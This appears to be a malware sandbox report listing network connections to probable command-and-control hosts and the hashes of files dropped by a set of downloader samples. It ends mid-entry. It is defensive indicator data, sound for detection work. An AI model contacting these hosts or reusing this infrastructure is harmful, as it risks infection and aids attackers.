IE 185.166.142.23:443 bitbucket.org tcp
US 148.163.102.170:4782 tcp
US 3.5.27.45:443 bbuseruploads.s3.amazonaws.com tcp
YE 46.161.245.208:40500 udp
N/A 127.0.0.1:55035 tcp
N/A 127.0.0.1:55051 tcp
N/A 127.0.0.1:55064 tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
GB 104.86.110.120:443 tcp
DE 193.161.193.99:35184 tcp
US 20.42.65.90:443 browser.pipe.aria.microsoft.com tcp
US 20.140.56.69:443 fp-afd.azurefd.us tcp
N/A 127.0.0.1:55069 tcp
N/A 127.0.0.1:55080 tcp
N/A 127.0.0.1:55110 tcp
UZ 83.222.7.85:40500 udp
US 172.202.64.254:443 arc-ring.msedge.net tcp
US 52.123.128.254:443 dual-s-ring.msedge.net tcp
US 148.163.102.170:4782 tcp
YE 134.35.205.29:40500 tcp
KR 3.36.173.8:50500 tcp
US 67.205.154.243:35184 tcp
US 38.224.37.24:40500 udp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
IR 185.80.102.252:40500 udp
DE 193.161.193.99:35184 tcp
CO 181.131.217.244:30201 navegacionseguracol24vip.org tcp
NL 178.237.33.50:80 geoplugin.net tcp
RU 91.240.118.204:8000 91.240.118.204 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
UZ 89.236.217.71:40500 udp
RU 94.198.55.181:4337 tcp
RU 185.81.68.147:1912 tcp
US 67.205.154.243:35184 tcp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:1912 tcp
DE 212.113.107.84:80 212.113.107.84 tcp
DE 193.161.193.99:35184 tcp
KR 3.36.173.8:50500 tcp
MX 189.133.187.71:40500 udp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
FR 82.64.156.123:80 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 148.163.102.170:4782 tcp
N/A 172.16.16.140:40500 tcp
KR 3.36.173.8:50500 tcp
SG 216.107.138.162:40500 udp
US 67.205.154.243:35184 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
US 54.231.203.81:80 pentestfiles.s3.amazonaws.com tcp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
UZ 217.30.162.37:40500 udp
US 148.163.102.170:4782 tcp
US 67.205.154.243:35184 tcp
YE 46.161.233.39:40500 udp
KR 3.36.173.8:50500 tcp
FR 82.64.156.123:80 tcp
GB 2.18.27.153:443 metadata.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 198.163.204.6:40500 udp
KR 3.36.173.8:50500 tcp
DE 193.161.193.99:35184 tcp
RU 188.119.66.185:443 tcp
NL 31.214.157.206:2024 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
FR 82.64.156.123:80 tcp
NL 149.154.167.99:443 t.me tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
UZ 45.150.26.122:40500 tcp
UZ 90.156.163.98:40500 udp
US 148.163.102.170:4782 tcp
US 67.205.154.243:35184 tcp
CA 35.183.28.21:80 status.mycompliancereports.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 185.215.113.36:80 185.215.113.36 tcp
IR 5.232.155.0:40500 udp
US 3.165.224.162:443 d2e5gvivzj4g90.cloudfront.net tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
PK 202.70.150.106:40500 udp
RU 185.81.68.148:80 185.81.68.148 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
KR 3.36.173.8:50500 tcp
US 67.205.154.243:35184 tcp
US 148.163.102.170:4782 tcp
FR 82.64.156.123:80 tcp
KR 3.36.173.8:50500 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
IR 188.215.221.55:40500 udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 home.sevjs17sr.top udp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
DE 193.161.193.99:35184 tcp
FR 82.64.156.123:80 tcp
UZ 89.236.219.80:40500 udp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
IR 89.219.115.156:40500 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
RU 185.81.68.147:1912 tcp
US 67.205.154.243:35184 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
KZ 5.251.47.42:40500 udp
KR 3.36.173.8:50500 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
DE 193.161.193.99:35184 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 148.163.102.170:4782 tcp
KR 3.36.173.8:50500 tcp
UZ 89.249.62.7:40500 udp
US 216.239.36.21:443 virustotal.com tcp
US 216.239.36.21:443 virustotal.com tcp
RU 185.81.68.148:80 185.81.68.148 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 216.239.36.21:80 virustotal.com tcp
US 216.239.36.21:80 virustotal.com tcp
FR 82.64.156.123:80 tcp
US 67.205.154.243:35184 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
US 216.239.36.21:443 virustotal.com tcp
YE 178.130.103.42:40500 udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 148.163.102.170:4782 tcp
FR 172.217.20.206:443 clients2.google.com tcp
DE 193.161.193.99:35184 tcp
SY 82.137.218.134:40500 udp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
UZ 185.203.237.215:40500 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 67.205.154.243:35184 tcp
KR 3.36.173.8:50500 tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 148.163.102.170:4782 tcp
IR 85.185.237.83:40500 udp
KR 3.36.173.8:50500 tcp
RU 188.119.66.185:443 tcp
DE 193.161.193.99:35184 tcp
US 162.159.135.234:443 gateway.discord.gg tcp
NL 149.154.167.99:443 t.me tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
NL 31.214.157.206:2024 tcp
IR 91.185.130.166:40500 udp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
FR 82.64.156.123:80 tcp
US 67.205.154.243:35184 tcp
IR 93.119.90.81:40500 udp
DE 23.42.16.93:443 steamcommunity.com tcp
US 148.163.102.170:4782 tcp
IR 93.118.99.152:40500 udp
DE 193.161.193.99:35184 tcp
KR 3.36.173.8:50500 tcp
FR 82.64.156.123:80 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
IR 2.191.14.149:40500 udp
KZ 46.36.149.47:40500 tcp
GB 20.26.156.215:80 github.com tcp
KR 3.36.173.8:50500 tcp
GB 20.26.156.215:443 github.com tcp
US 148.163.102.170:4782 tcp
US 67.205.154.243:35184 tcp
FI 37.27.43.98:443 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
UZ 90.156.160.6:40500 udp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
UZ 195.158.18.194:40500 udp
RU 185.81.68.147:80 185.81.68.147 tcp
US 67.205.154.243:35184 tcp
FR 82.64.156.123:80 tcp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
KR 3.36.173.8:50500 tcp
IR 2.181.218.207:40500 udp
RU 185.81.68.148:80 185.81.68.148 tcp
RU 90.189.250.159:40500 udp
IR 2.190.67.184:40500 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
FR 82.64.156.123:80 tcp
UZ 87.237.234.159:40500 udp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
IE 20.190.159.2:443 login.microsoftonline.com tcp
NL 31.214.157.206:2024 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 67.205.154.243:35184 tcp
KR 3.36.173.8:50500 tcp
FR 82.64.156.123:80 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
IR 5.219.134.102:40500 udp
NL 31.214.157.206:2024 tcp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
GB 104.86.110.120:443 tcp
KZ 82.200.228.118:40500 udp
YE 134.35.158.149:40500 udp
KZ 5.251.234.88:40500 udp
UZ 90.156.160.10:40500 udp
MX 187.223.139.73:40500 udp
KZ 92.46.228.246:40500 udp
IR 2.177.228.237:40500 udp
UZ 90.156.162.48:40500 udp
NE 41.138.38.164:40500 udp
IR 80.250.196.82:40500 udp
SY 88.86.12.98:40500 udp
UZ 89.249.62.14:40500 udp
UZ 90.156.160.30:40500 udp

Files

memory/5032-2-0x0000000000500000-0x0000000000508000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe

MD5 760370c2aa2829b5fec688d12da0535f
SHA1 269f86ff2ce1eb1eeed20075f0b719ee779e8fbb
SHA256 a3a6cde465591377afc5f656f72a00799398fd2541b60391bcb8f62b8f8cace3
SHA512 1e63051694056ffcd3aa22edb2bef3bb30401edc784b82101f5dc7f69756b994e84e309a13bdb64b6e92516e895648ee34598de70e8882569d79dbfdab61a847

memory/1204-10-0x0000000000400000-0x000000000068B000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe

MD5 51aa89efb23c098b10293527e469c042
SHA1 dc81102e0c1bced6e1da055dab620316959d8e2a
SHA256 780f11f112fcf055a2f9d6b12ce3750aed7720b85528a7adaf114067446f4292
SHA512 93230b7881a9141453c1c84e8f74085a150ce62ecd0acd80367cb16048cb9de67a7f99d1345602ad3ecd71fc2e159a4f17269f172dc7b60272f65d50e1b608fa

memory/2376-23-0x0000000000170000-0x0000000000180000-memory.dmp

memory/2376-24-0x0000000005290000-0x0000000005836000-memory.dmp

memory/2376-25-0x0000000004CE0000-0x0000000004D72000-memory.dmp

memory/2376-26-0x0000000004C30000-0x0000000004C3A000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe

MD5 f9a6811d7a9d5e06d73a68fc729ce66c
SHA1 c882143d5fde4b2e7edb5a9accb534ba17d754ef
SHA256 c583d0a367ecffa74b82b78116bbb04b7c92bed0300ed1c3adc4ef3250fbb9cc
SHA512 4dec52f0d1927306deda677fea46d103b052aaa5f7d7f49abe59a3618110ee542c2db385158a393970751fcc9687efe44a860d6330ed474c0c849369c0da56df

memory/1956-39-0x00000000004C0000-0x00000000004D0000-memory.dmp

memory/3496-40-0x0000000000B70000-0x0000000000B78000-memory.dmp

memory/3496-41-0x0000000005560000-0x00000000055FC000-memory.dmp

memory/4936-42-0x0000018332C30000-0x0000018332CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zffiq3ho.ipu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4936-52-0x000001831A500000-0x000001831A510000-memory.dmp

memory/4936-51-0x000001831A6C0000-0x000001831A6E2000-memory.dmp

memory/4936-53-0x0000018332DD0000-0x0000018332ED2000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe

MD5 ddce3b9704d1e4236548b1a458317dd0
SHA1 a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
SHA512 5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe

MD5 81bc4049ed6cb947f7c62c48a098ad98
SHA1 78d45a3b798e1b033cd9d00e49cd8057db9ce5c4
SHA256 f12132315cc4b87a04366061d26e9e61367b2472bb3e5b98fca26432dd4e21ef
SHA512 3f52973597acc5fabd0b9272e82d529de4d14e3d865caa9c3420ef70a443fed5b7b5cbfbb1f87568b6e9b5f8700e1b408579cfb39a55e9c875e32468a94fbed1

memory/3828-76-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp

MD5 a79e2717dea9776d2b876b96c5bbb50d
SHA1 b58503e92a5098a9682ad87d6a0952a1f4da2e3c
SHA256 d2c13dc08c217ea037228ea15a9bb0914843f979a4aec4b6fb9733add13756e7
SHA512 a4230b154addfc35499c45e8f35d017aa55ffad7040385a1459938f20fa36b45c3ff41fc22681d63b4fd0309582bcc7875cf61f762c5f3cae9720d69c7df30df

C:\Users\Admin\AppData\Local\Temp\is-7UAN9.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/5032-104-0x000000001BEC0000-0x000000001BF00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe

MD5 02525cd21eee24cf502f251c539c1de0
SHA1 129606f7a38a2a04b90cedb69e8fc74ae09f6377
SHA256 6ef904a0a8e3be2d9db3ed0fd128b2397cc14dc0aa6dcc24f3505e36844c0148
SHA512 3512c2ef2ebaef27412b9ce96f396f6eed7050dbf545d52ed8bf11999384eb3096dcfbcfa83a3c9597e9a842ff301387b60d82cb211cd8b2c8dbb025deb7cf8f

memory/2944-122-0x0000000000400000-0x00000000006F4000-memory.dmp

memory/2944-118-0x0000000000400000-0x00000000006F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f0e62045515b66d0a0105abc22dbf19
SHA1 894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512 f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b700dd28cad30c7ed7a7e6fc6367002
SHA1 ef00fcc0d512758d428a5c0c73c34f0c01cefdeb
SHA256 8b8532ff0ed06dd5696cdf54fc5909757444e82f5739d8402e2534e813573ddd
SHA512 8bd5d5209fce602c1bb4eacf081744a5a5524cc05d48adf9e2343f49b7a1f9e510cc859d1796d84291ba0172059ca7bd32bfd1d0840310cafb18839257bd375a

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

MD5 36a627b26fae167e6009b4950ff15805
SHA1 f3cb255ab3a524ee05c8bab7b4c01c202906b801
SHA256 a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a
SHA512 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe

MD5 ee6be1648866b63fd7f860fa0114f368
SHA1 42cab62fff29eb98851b33986b637514fc904f4b
SHA256 e17bf83e09457d8cecd1f3e903fa4c9770e17e823731650a453bc479591ac511
SHA512 d6492d3b3c1d94d6c87b77a9a248e8c46b889d2e23938ddb8a8e242caccb23e8cd1a1fbeffee6b140cf6fd3ea7e8da89190286a912032ce4a671257bd8e3e28a

memory/2148-181-0x0000000000550000-0x00000000005E0000-memory.dmp

memory/3496-182-0x0000000006720000-0x0000000006760000-memory.dmp

C:\Users\Admin\AppData\Roaming\msvcp110.dll

MD5 9bc424be13dca227268ab018dca9ef0c
SHA1 f6f42e926f511d57ef298613634f3a186ec25ddc
SHA256 59d3999d0989c9c91dae93c26499f5a14b837a0fe56e6fc29f57456f54a1f8a2
SHA512 70a1abb35bd95efc40af6653d5db2e155fab9a8575b7ae5b69ab3fbcd60925c66a675dac6cba57564a430e9b92f1a2ea9e912c4d7f356b82696ed77e92b52715

memory/4604-189-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4604-193-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4604-191-0x0000000000400000-0x0000000000465000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe

MD5 9dcf036916a9158cc7087c80374db9ae
SHA1 69d9b8ffe2c74adebe1d1dcca6f42cb394e3f045
SHA256 28773fb2aff96e836707d9ffd5e8aa706d0ce54c956fbee42b9dd9b150e997e8
SHA512 d4c585730a46f900eb691fbad746e4a7354396cf5372929afdc62198c9a6e0cabf388d1c3c72dcab3b6b07d29f89c63a327a9fb4ad34e8eedb2fc03455e17727

C:\Users\Admin\AppData\Local\Temp\Hazards

MD5 fea90ee4f7b41c990ccbfc1fe6cb36e2
SHA1 27c232073d1aae528370c5c445168c5f18a81393
SHA256 432282430dfdc908c5d10d815c2f209d2cf671729bec700c141a7c15f086a625
SHA512 12dce50983c4e5c3e88ba05a172ab611b50edc91164253e465b3c4e6db13ef825b0d57a1c0040f80aa97e4bf49eea4bc8a50d1ba897dd2470bf600b87226b71e

C:\Users\Admin\AppData\Local\Temp\Cancer

MD5 95d5c71511485e0977f79bbca432ab44
SHA1 49fc139ad863ea70aaa7b74b6c69f79421849213
SHA256 17859a0845a3aa3b871802e39aac960ca443be9a5436d4930d11602ff16a5c8c
SHA512 18ab9362ea9b876e6bf7425c0215b7ef30834cdf819de2c34ff3dd78950d22c2a6d2527e0ba8235a9ba6c5cbc8261bd4333635af1cd04e9f3e9f1ab9162fdc8c

C:\Users\Admin\AppData\Local\Temp\Karen

MD5 fc98545e276bc0ba559a0d98a374f859
SHA1 f1bdf1c5112b26b2165057c6fc0f3c00efd0ece8
SHA256 6203bcb6a49875494cbf42af8b701d68e29df5d5a4ecfbe2d5b83b3ed2e56a3f
SHA512 00e2a755b77b086233b26f2f39b7b8a0ae660ed1d890691a5e0c619ccb8f810cd91d1b3ff72b07ef65e79710d96edf766da6dd62c12e6e64c16767b4410480c9

C:\Users\Admin\AppData\Local\Temp\Sol

MD5 38728077efb1aaf4a5302ee1b642e8e6
SHA1 2c6125b8ef7cbf92a4afecbc81362bf9e112cb11
SHA256 4f0274b7c37c160b40b6f4ed1b16d3401685a2d77cc2eb5a6833f5eb211db8d6
SHA512 872d54274c0f2fa6204b354b2ab1f38646d4f208b8578a5a64bed18a216af2376b86628548918225ae35ea1255cea0453d88142b5f84015e515dacbdbb3befd4

C:\Users\Admin\AppData\Local\Temp\Variable

MD5 7e3393cad709862f92a1005bf68355c8
SHA1 5bed6c4cb4ad2bc266356dc99b122f814800a945
SHA256 97697a5494ba0cdff7bf5f6c68b7bdcb09878f49ec184de4010d550be10859cb
SHA512 a01c70c99eb9b990be8e66f97781998043570bb4de2e789669536403ba8329cdfa889f6485f8fe1422feaa5f50149cbae046da0aff121115977fab5fc401af5f

C:\Users\Admin\AppData\Local\Temp\Zinc

MD5 1d7b5851c7e933b58f5a4a94e8c2fff0
SHA1 35fdba1e3aebf7348b4478dee028904aba21e4ce
SHA256 4d3d063a5a5a079c4d4e73f96e3c9aecdef3f1a5a16621f28cdba69daee42f4d
SHA512 94e20dee259193d12d01a1188d8ff0c21346c1ff374fce9c63678c73d5520513f5b5ccd4c0bb6d6aabc29626f9f05edf184be65848ffddedb3358cb3fa8ff3d9

C:\Users\Admin\AppData\Local\Temp\Oe

MD5 77e4f81724b2590c5821fad1104a9c9d
SHA1 71b19cdffc9a001c81716236e0ba4f3332ee421e
SHA256 68d4ec5edbd9a43d0536280645c0744c3d0afdea5dbbeeb4c82d81e85f0e113b
SHA512 cbb5148937753e8450792ab36fa49fb1a38b0efcd1a7d6e72b62c7f888a04b18044f6c4da41dca259e7d37c8e6d7c687f6317bedb2853a61cdfbbb7cb635ce96

C:\Users\Admin\AppData\Local\Temp\Increases

MD5 93ad89c806c4f0764e8ec1f2da32cd00
SHA1 e2d06933fa8593eac974632c8deb105dab8a69d6
SHA256 30200f51a56ec16f0aa4ff3d6d2585556416da1c8d121644a6a70baf67ed00a9
SHA512 c60ec2af7540802fad89706e9c85348d3faf3efc2da1f662b274b3717d487c7ade374e4ca9ce1d9f91a3898e3f0e9c38c8a1d2648d9518b37bf52cdc5252e0a7

C:\Users\Admin\AppData\Local\Temp\Independently

MD5 f7e35bfd4fa836e2b29743db6b7242e6
SHA1 aafd870b2d62baa20809a1d170a3bf7aa4d60c00
SHA256 6dedc21c1f4fbd1b98ca7c9c964a4a37755a60fab376d39e8ef52343888bc5cb
SHA512 37f5ded199e3a2f9cd7ce873fe2d022a856b2c1c985f48df1bef785327a483324ffa41e1f0c21def7bb59b7d80d109e4b57c338a53c63bf2fe2c3409c6259e70

C:\Users\Admin\AppData\Local\Temp\Devon

MD5 f7e62bb95a24d3c390a038eb976ab39c
SHA1 982ef476a20d9dc2b26342b455f3ec1a4436adcc
SHA256 332f851f3454e797c9eb1ac4defadc0edcd47ffe62711142360bd8adee1989c3
SHA512 d4e6e6bee7f1b26357d9435856fbc9bac2b208e6b2a87f7b0ca925b45aad8d3157aa01cee6fa1846e09c8f036127e322ffb748bc8313201624a8d5bbdd58cc33

C:\Users\Admin\AppData\Local\Temp\Hotels

MD5 a438b2533d1f397584a64b1930d0fb47
SHA1 d49f34043b3dd87e61c293ccfd32793cb84e2c01
SHA256 45ea4b92260219f0f911a9f4e34d6e34a6acdce47bd4adabfbe6a590cbf1b180
SHA512 1aea810407fb14911bd7e9218831771ca7b5c8a25b560108387300d3a6de4b12dc9d6d3dc7590f05324a8f9418839321c34727c846b2f5e63c1a45a166989674

C:\Users\Admin\AppData\Local\Temp\Automobile

MD5 5afd0c99996c2f5b79957d7e571805be
SHA1 8f46c56d8185362fd14a708bc536febf52aab37f
SHA256 e228a8330c23b23181fad534ce378d0e595b318797f4bffb617f5a09d8084454
SHA512 c62f77e42f1dd64ace9b6837ae149b0eb775abab91476eff54d86d883babc439ea096cc8dcf2508929d46be6a362d6091ff6cffd8b2e79f00bd359cc375648e9

C:\Users\Admin\AppData\Local\Temp\Albany

MD5 c3e50ef81367a341cf75df50def52b2d
SHA1 e0b0d31d00cfa6dd3e42c004cce8f0b5e556dcc4
SHA256 64e68df4c8f3f684e45d09422adb521609539c518bb73d7749c88004573f3fa2
SHA512 94d920985b0dde1a9f8647d5c732a7add05e5a6f501b02d9d511fc07cfa62394c7e25716aa880720aef7c9c2568f696aaaa555a16ef5d5ec354fc44f2ba8ce1f

C:\Users\Admin\AppData\Local\Temp\Georgia

MD5 043e3b4e7a35b8e60502464e0c6ce00c
SHA1 c77ce7d2b27b2e8df3104b3acbf2d5c16892599e
SHA256 716e1250dcdea0c65da29317d36f57c9fbfbb08633e6602dbbf13e6045d82386
SHA512 9a113f8b8e4a5098220c65e3be85860a0911fbf7e8f665383605e3cdf5648415cd8f4c57de845ccccd4fb462a25d4a29ffb91c0da81e0bbcd0a497cb333d53b1

C:\Users\Admin\AppData\Local\Temp\Guess

MD5 508e9659524c26bece1dcb56fd4ed434
